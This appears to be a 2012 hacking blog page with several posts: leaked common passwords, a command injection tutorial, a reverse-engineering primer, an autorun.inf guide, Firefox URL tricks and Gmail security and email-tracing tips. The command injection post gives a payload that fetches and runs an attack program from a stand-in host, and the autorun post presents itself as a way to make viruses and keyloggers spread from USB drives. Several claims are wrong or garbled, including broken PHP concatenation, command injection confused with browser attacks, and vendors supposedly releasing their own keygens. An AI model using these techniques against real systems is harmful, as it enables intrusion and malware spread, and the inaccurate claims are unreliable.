Thursday, 6 September 2012

Top 50 Common Passwords Internet users use

Password guessing(social engineering) is one of the fastest technique to hack any account but most of times chances are quite rare but most internet users are stupid enough as they choose very foolish passwords for their email accounts. According to a survey by Sophos 33% of the people use the same passwords on social networking website and email accounts and some even use same password for internet banking. What this means that if a hacker can get inside a person's Facebook account, then he can also get inside his/her other accounts using the same password. The chart below is the set of most commonly used Gawker Passwords that were leaked online due to a security breach in year 2011.

top 50 common passwords of year 2011
Top 50 Passwords of year 2011
The following incident shows us how careless people can be while choosing their passwords and ultimately getting themselves hacked. Alternatively if you are worried that you password might be guessed or simply want to check if you are using a poor passwords.

Please watch the below video for learning how to create secure passwords:

I hope you guys might not be using any of these passwords. If yes please change your passwords and never use such stupid passwords as these types of passwords are very easy to crack using the dictionary attack.
Play well to enjoy well...
Have fun..
You might also li
Posted by at No comments:

Hack websites using Command Injection

Hey friends, previously i have explained how to use SQL injection and XPath Injection to hack websites. Today i will teach you another type of injection technique that if executed properly can give you complete ownership of victim's website, called Command Injection. When user input is used as a part of system command, an hacker may inject system commands into the user input..Ahh..confusing...:P Lets understand in clear and simple words..
What is Command Injection?
Command injection is an attack method in which we alters the dynamically generated content on a Web page by entering shell commands into an input mechanism, such as a form field that lacks effective validation constraints. We can exploit that vulnerability to gain unauthorized access to data or network resources. When users visit an affected Web page, their browsers interpret the code, which may cause malicious commands to execute in the users' computers and across their networks. The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable website. In situation like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it as any authorized system user. However, commands are executed with the same privileges and environment as the application has. Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers etc.).

hack websites using command injection
Command Injection Tutorial for Hackers
This can happen in any programming language but its very common in PERL, PHP and shell based CGI. It is less common in Java, Python and C++ ..:P i haven't tried it yet there :D tried once or twice but not able to do so, that why uncommon..:P.

Lets understand things using examples
Consider the below PHP code:
<?PHP
$email_subject ="Welcome to HackingLoops";

if  ( isset ($_GET {'email'} ) ) {
system( "mail " + $_GET {'email'}) + "-s ' " + $email_subject +
" ' < /tmp/email_body", $return_val);
}
?>
The above code is an example where user sends his or her email address in the email parameter, and that user input is directly placed in the system command. Ahh... loophole...
Now similar to SQL injection or XPath injection, our goal is to inject the shell command into the email parameter but make sure code before and after the email parameter remain syntactically correct otherwise the injection will not execute.
Consider the system( ) call as small jigsaw puzzle game where we arrange different puzzle part to make a single image. All the parts except one part are on its place, now we have to find the middle part to finish the puzzle.. :D simple task in game but little tricky in command injection. So our objective is something shown below:
mail  [missing puzzle part]  -s  'Welcome to HackingLoops'  </tmp/email_body
Note: For the missing puzzle part, we need to ensure that the mail command runs properly and exits properly basically i want to focus on syntax, it should be syntactically correct.
For example mail  --help will runs and exits properly. Now we can add other additional shell commands by separating the commands by a semi colon (;).
We can also comment the missing puzzle part using the shell commenting symbol (#) in front. So we can manipulate the missing puzzle part as below:
--help; wget http://somehackersite.com/attack_program;  ./attack_program #
Now the adding our missing puzzle part to our original existing shell command, the below shell command is created:
mail --help; wget http://somehackersite.com/attack_program; ./attack_program # s 'Welcome to HackingLoops' < /tmp/email_body
This resulting command is equivalent to below command:
mail --help; wget http://somehackersite.com/attack_program; ./attack_program
Now what the above command will do..:P You all guys are just reading things like novice hackers.. Any Guess...:P ok..let me explain..
The above shell command will runs the mail --help and then downloads the attack program from somehackersite.com  and executes it on victim, allowing the hacker to perform the arbitrary commands on the vulnerable website. In most cases provide the complete access to the root directory..:P Now do whatever you want to do..
That's all my friends. I hope that you all have enjoyed the tutorial, if you have any doubts or queries ask me in form of comments.
Copy Cats its last warning from HackingLoops, stop copying our articles, if you copy articles always mention the source. Otherwise get ready for DMCA penalty and negative rating on Google.
Posted by at No comments:

RCE Tutorial | Reverse Code Engineering Intro Part 1

Hello Friends, Welcome back after a long time on HackingLoops. Today i will teach you basics of Reverse Code Engineering simply called RCE and in future hacking classes we will discuss it in depth with practical reverse engineering examples. We will cover complete reverse code engineering concepts one by one and i have divided the tutorial into 8-10 different parts which will give you a complete idea of RCE and different tools like IDA pro and other debuggers like ollydbg, disassemblers, obfuscators etc.
Today we will discuss what is reverse code engineering? How its useful for ethical hacking? Common terms used in reverse engineering. In next post i will share the coding tutorials for Assembly Language and Register manipulation and memory heap basics that i normally use to reverse engineer any program, software or windows file. So friends, lets start our hacking class of reverse engineering.
reverse engineering
Reverse Engineering Introduction
What is Reverse Engineering?
Have you ever noticed, say any famous company like Apple made an application or introduced a new feature and after few days you find that some other company also introduced the same. The magic behind this is a technique known as reverse code engineering. They decode or reverse engineer their programs or applications to get the basic structure of the original program and then following the structure, codes their own application and what hackers do they reverse engineer the code and make keygens and patches to crack the application and in some cases releases the source codes like what happened in case of NORTON( Internet security Giant).
According to Wikipedia "Reverse engineering is the process of discovering the technological principles of a device, object or system through analysis of its structure, function and operation. It often involves taking something (e.g., a mechanical device, electronic component, biological, chemical or organic matter or software program) apart and analyzing its workings in detail to be used in maintenance, or to try to make a new device or program that does the same thing without using or simply duplicating (without understanding) the original".
Ahh.. more technology related. I will explain you in better way. As the name suggest reverse engineer means if you have something that is already made, in computer field say exe, binary or simply installer package. Now what reverse engineering is, decoding the exe or binary in such as fashion that we will get original source code or some what near to it or get the basic architecture of the design. Consider an example, you have a wall made of bricks, here bricks are base material to build the wall. Now what we want to do is we want to obtain all the bricks from the wall. Similarly we have an executable or dll file and we know programs are made from coding only, so source codes are base material in building executable. So we want to obtain the source code from the executable or some what near to it. As when you break wall also to get the bricks some bricks are also got broken and that's all depend type of material used to fix or mend bricks to make the wall. Similarly the retrieval of source code from executable depends upon how securely software is being packed and type of cryptography or packer is used by its designer.
I hope now you have got what exactly reverse engineering is...
What is the use or benefit of Reverse Engineering?
I can guarantee most of internet users use cracks or keygens or patches. Have you ever tried to understand how they are made. Ahhh... I know you haven't. So let me give you clear information. All the keygens or cracks or patches of software's are made by technique called Reverse Engineering. Oops... I was going to tell the benefits.. what i am telling...negative features... But these are features of reverse engineering my friends and most commonly used by all famous organizations as its a part of their Program promoting methodolgy. They wants users base that's why they themselves releases keygens and patches of their software's so that their market visibility ratio will be maintained otherwise open source will acquire their place. Like what famous companies like Microsoft, Adobe do, do you think they cant develop a software that can't be cracked. Its two easy but they avoid it because if they do so people will look for open source alternatives and by this, they will loose their customer base simply called Market visibility.
Other Beneficial Uses of Reverse Engineering:
  • Product analysis: To examine how a product works
  • Removal of copy protection, circumvention of access restrictions.
  • Security auditing.
  • Extremely useful when you lost documentation.
  • Academic/learning purposes.
  • Competitive technical intelligence (understand what your competitor is actually doing, versus what they say they are doing).
  • Last but not the least..Learning: learn from others' mistakes. Do not make the same mistakes that others have already made and subsequently corrected.
Common Terms Used in Reverse Engineering:
1. Debugger : A debugger or debugging tool is a computer program that is used to test and debug other programs (the "target" program). This helps in finding out loopholes in the applications and programs. Penetration testers uses debuggers to test their programs. Famous example of debugger is ollydbg. I will explain theses in detail in coming classes.
2. Disassembler: A disassembler is a computer program that translates machine language into assembly language. It behaves in completely opposite manner of an assembler.
3. Decompiler : A decompiler is the name given to a computer program that performs, as far as possible, the reverse operation to that of a compiler. Note decompiler and disassembler are both different things. A decompiler translates the code into high language like C, C++ etc which disassembler generates a assembly code.
4. Packers or Unpackers: Packers do simply as their name suggests, they 'pack' or 'compress' a program much the same way a compressor like Pkzip does, packers then attach their own decryption / loading stub which 'unpacks' the program before resuming execution normally at the programs original entry point. The weakness of every packer is of course simple, if a program runs it must be unpacked at some stage and at said stage we can dump the program to disk.
5. Program Obfuscation: Programmers may deliberately obfuscate code to conceal its purpose (security through obscurity) or its logic to prevent tampering, deter reverse engineering, or as a puzzle or recreational challenge for someone reading the source code.
6. Hex Editing: As name suggests, we use hex editors to edit the binaries and exe's.
7. Cryptography: Cryptography is a technique to protect the data( any form ) in the computer world. Cryptography is most often associated with scrambling plaintext (ordinary text, sometimes referred to as cleartext) into ciphertext (a process called encryption), then back again (known as decryption).
I will explain these terms in detail in my coming articles. Till then you can explore these topics on internet so that you will have some prior knowledge of Reverse Engineering terms.
Note: Reverse Code Engineering articles will going to be more advanced and technology oriented which surely requires prior knowledge of Assembly language specially registers and accumulators and several reverse engineering commands like JMP, DCL etc.. Don't worry i will try to cover these basics in my next article of reverse engineering where we will explore about assembly language and other registers related stuff. Till that time keep exploring things.
Posted by at No comments:

How to Create autorun file for pendrives or usb drives

Hey Friends, today i am going to teach you "How to create a Autorun.inf file for USB drives or simply CD drives" so that it can execute programs. Programs can be viruses, keyloggers, rats or simply normal services that you want to execute automatically whenever user open his/her pendrive or USB drive. Its the easiest way to spread your programs to schedule, so that they can execute by itself without any user interaction.
Creating a simple or complex autorun file for your pendrive or USB drive.
Note: You can also follow these instructions when making a CD. You just have to burn it on the cd.

create autorun file for Usb drives or pendrives
Creating Autorun.inf file for executing keyloggers or viruses


When you plug a  USB or pen drive in, you might be interested in making a program, or other things happen as soon as you plug in. The way you accomplish this is through the Autorun.inf file. The autorun.inf file is located in the root of the usb drive and tells Windows what to do automatically.

This autorun can be used for good things and also for bad things depending on what you like. I am Destructive Mind, so i use it to run my coded viruses and keyloggers to execute automatically by themselves as soon as user open folder or simply opens pen drive or usb drive.



This tutorial covers:
  • Creating a USB Autorun.inf
  • Changing label\icon of thumbdrive
  • Making a new option appear in the autorun menu
  • Making programs automatically run when plugged in
So Read On How to create Autorun.inf file...
  
Creating a USB Autorun.inf :
To create an autorun file, open Notepad and save ‘autorun.inf’’ (with quotes) and save it to the root of the drive. All it needs to have is in the first line;


[autorun]



Changing label\icon of thumbdrive:

Follow the steps in Creating a USB Autorun.inf. Before you save it, type this in in this order!


 [autorun]

icon=myicon.ico

label=MyLabel



And save. Make sure the icon file is in the root of your drive.


Making a new option appear in the autorun menu:


Right, so make your autorun file and type this into Notepad:






[autorun]

icon=default

label=[yourlabelhere]


action=programname.exe








Open Program




Save it and exit. Once again, the program has to be in the root. Now, when you plug it in, the option should appear in the menu.


Making programs automatically run when the USB is plugged in:


Follow the same instructions, blah blah blah;



[autorun]

Icon=default

label=YourLabelHere

open=programname.exe


And that’s it for this tutorial! Your Autorun program is ready to execute whatever you want. Here i have written to execute a simple program called programname.exe

If you have any questions or queries, ask in form of comments. If you like my articles just a comment of appreciation will do the thing.
Posted by at No comments:

Cool Mozilla Hacks | Hacking Mozilla Firefox

Hello Friends, Today i am sharing with you the latest hacks explored by me in Mozilla Firefox. I love to explore new things and see what happens, i discovers loop holes and cool tricks. I guarantee you that you have never tried to think in this fashion. So guys lets enjoy the latest mozilla hacks explored by Lokesh Singh...


1. Browser In browser and again browser in browser and so on...


Enter the following string in to your Mozilla Firefox address bar and see what happens
chrome://browser/content/browser.xul

I think you entered just once now enter again in the new browsers address bar and continue enjoying it.. Below is the snapshot of this hack:
latest mozilla firefox hacks and tricks
Browser in Browser hack in Mozilla Firefox

2. Special Effect Scrolling Mozilla Firefox
You will really love this effect...little bit irritating but awesome...as its isoftdl special by Lokesh uff LoneRusher or Destructive Mind....Just type below text in address bar of Mozilla..

chrome://global/content/alerts/alert.xul
3. Display Cookies without any Cookie Manager
You can view cookies directly in Mozilla Firefox just by entering below text in the address bar..
chrome://browser/content/preferences/cookies.xul
4. Check history of Mozilla Firefox directly through URL
Ahhah...Alternate way to view history in better way.. Just enter the below text into the address bar to see the History of visited websites....
chrome://browser/content/history/history-panel.xul

5. Display all your bookmarks
We can view our bookmarks directly using below URL in address bar..
chrome://browser/content/bookmarks/bookmarksPanel.xul
6. Advanced Tab using URL
You can directly view the advanced tab in firefox using below URL..
chrome://browser/content/preferences/advanced.xul

7. Advanced Javascript settings:
chrome://browser/content/preferences/advanced-scripts.xul

8. Setting for clearing History and Cookies and other stuff..
chrome://browser/content/preferences/sanitize.xul
9. Change or view Font Settings in Firefox
chrome://browser/content/preferences/fonts.xul
Posted by at No comments:

How to detect unusual activity in Gmail account

Hello friends, do you think or suspect your email account has been hacked or somebody else is using your account? Do you suspect that your Email account is under attack? Is email account secured enough that it cannot be hacked? Do you want to make your email account 100% hack proof? If Yes, then this article is for you. So friends read on..

Find Unauthorized Activity in Your Email Account

Sometimes our email account has been hacked and we are not aware of that. Someone else i.e. some hacker is accessing your account and might be misusing it. But since we are not aware of that and we still think that our account and its privacy is safe but some third person is using it and accessing our private information and details. Now How you will detect that your account is under attack that How to find unauthorized activity in your email account. Here are few tips.


These are some signs of Unauthorized activity in Your email account:
1. Your new emails are marked as Read even if you’ve not read them.
2. Your emails are moved to Trash or even permanently deleted without your notice.
3. Your emails are being forwarded to a third party email address (check your settings then go to forwarding).
4. Your secondary email address is changed.
5. Phone Information is changed.
If you come across any of the above activities on your email account, then it is a clear indication that your email account is hacked.

There are some additional security features that Gmail provide its users for the Security and safety o your account.
Gmail provides an additional security feature to protect your email account through the means of IP address logging. That is, Gmail records your IP address every time you login to your Gmail account. So, if a third party gets access to your account then even his/her IP is also recorded. To see a list of recorded IP address, scroll down to the bottom of your Gmail account and you’ll see something like this.

You can see from the above figure that Gmail shows the IP address of last login (last account activity). You can click on Details to see the IP address of your last 5 activities. If you find that the IP listed in the logs doesn’t belong to you, then you can suspect unauthorized activity.

Steps to stop unauthorized activity on your email account
1. Verify you mobile phone, so that if your account is somehow got hacked then it will be easier to recover your email password.
2. If you suspect that your account is already hacked then these are the recommended things that you should perform.
a. Change your Password
b. Change your security question.
c. Remove any third party email address (if any) to which your account is set to forward emails.
d. Make sure that you can access the email account of your secondary email address.
e. Also change you secondary email password and security question.

This will help you to stop all the illegal activity in your account. But there are several peoples who have asked me that their account is hacked or they forgot the password . Now if your account is already hacked means you are not been able to access your account then wait fo
Posted by at No comments:

How to trace an Email Sender in Gmail

Hi friends, today i am going to teach you how to trace an email received in Gmail. Using this hack you can trace the source from which you have received the email
Hackers do a lot of stuff to hack into your email account so you should always be aware of such things like how to check the authenticity of the email that it has arrived from genuine user or its a fake email. There are two ways to check the authenticity of the email address:
1. Open the Email and Click on Show details.
2. For more deeper look Click on the triangle and then select show original.

Great, but i know 99% of you guys already know these but never tried to trace or somebody have tried but never got success. What is the reason behind that? Yup i know the reason.. All previous tricks to trace an email in Gmail are incomplete so you never received success in doing that. As i always focus on manual things as tools are for noobs and script kiddes. So guys lets learn how to trace email address manually.

How to Trace Email received in Gmail:
1. Basic Method(if sent through some website)
This method is applicable for tracing the email that is sent through the anonymous email or email forging websites. I have already explained earlier about email forging and how to send anonymous emails. If you wish to revise the Email Forging and How to send anonymous and fake emails visit below articles:

What is the main motive behind the fake emails, Have you guys ever tried to understand. If no, then here is three four basic things why Fake emails or anonymous emails are sent.
1. For Phishing purposes: Fake page links that are used to hack your email account.
2. For Spreading Botnets: Fake emails with attachments(.php,.jpg,.bmp etc) contains bots means self spreading Trojans that steals your email contacts and email that to hackers.
3. For Stealing your personal information or to cheat you.(mails like you won 10000000$ please send us your details to claim).
4. For promoting or virul a product. Most sellers use this trick to promote their companies products online on the name of email marketing but thats all fake they are in need of customers who can buy them and some already has bots attached in them to the mail has been automatically sent to all emails that are in your friend list.

Steps to trace Email received in Gmail (very basic method):
1. Login into your Gmail account.
2. Open the email whose sender details you want to see.
3. Click on Show details.
4 That's all it will show you all basic information about the email. Below snapshot will explain you better.
how to trace email address 
Click on Show details to see basic details
how to get senders information in Gmail
Information inside the show details for tracing email

2. Advanced Method:
The above trick hardly helps you to trace the email address. Now let's discuss advanced way to trace email.
Have you guys ever tried to under how emails are sent and received. Ahhahah Computer geeks you might have read in books about How email works that how its sent and how its received. If yes, then you surely haven't implemented that in practical life. For New Geeks read this article to know how email really works:

Emails are basically received in form of HTML headers. HTML headers consist of several things like Message delivered to or from, Subject, Received to or from, Date, Mime version,Content Type, X-mailer client etc.
How to trace email Advanced trick:
1. Go to the email and open it.
2. Now click on the triangle at top right end corner of the email screen as shown below and select show original email.
tracing email received in gmail
Detailed hack to trace email received in Gmail

3. Now you will see something like this:
identify who has send this email
More detailed Inner look of email In Gmail
Now See the second received: from SecretMythPC [71.142.245.186] . Its the source IP address ( IP address of system) from which email has been sent.

Now open Any IP address tracing website: Example i opened http://whatismyipaddress.com/

Now Trace the IP addess 71.142.245.186 to get his details and location of the sender. You will see something like this in the output:
trace email, track down the sender
His Complete Location chart

That's all friends, hope you all have loved it. This is the method how cyber police detects cyber criminals and reach their destinations.
Posted by at No comments:
Subscribe to: Posts (Atom)